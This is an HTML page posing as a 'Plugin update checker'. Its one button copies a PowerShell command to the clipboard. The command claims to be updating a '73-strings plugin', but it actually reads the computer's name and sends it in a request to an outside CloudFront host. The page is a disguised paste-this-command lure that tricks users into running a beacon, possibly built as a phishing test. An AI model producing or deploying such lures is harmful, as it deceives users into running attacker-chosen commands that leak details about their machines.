<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Plugin update checker</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #f4f4f4;
        }
        .container {
            text-align: center;
        }
        button {
            font-size: 20px;
            padding: 15px 30px;
            cursor: pointer;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 5px;
            transition: background-color 0.3s;
        }
        button:hover {
            background-color: #45a049;
        }
        .message {
            margin-top: 20px;
            font-size: 18px;
            color: #333;
        }
    </style>
</head>
<body>
    <div class="container">
        <button id="copyButton">Copy plugin updater</button>
        <div class="message" id="message"></div>
    </div>

    <script>
        document.getElementById('copyButton').addEventListener('click', function() {
            var command = "powershell Write-Host \"Updating 73-strings plugin\";$sofina=$env:COMPUTERNAME;curl \"https://d2q0jp8tyge29i.cloudfront.net/73-strings-computer-update-$sofina\"";
            
            var textarea = document.createElement('textarea');
            textarea.value = command;
            document.body.appendChild(textarea);
            
            textarea.select();
            document.execCommand('copy');
            
            document.body.removeChild(textarea);
            
            document.getElementById('message').textContent = "Command copied to clipboard!";
        });
    </script>
</body>
</html>
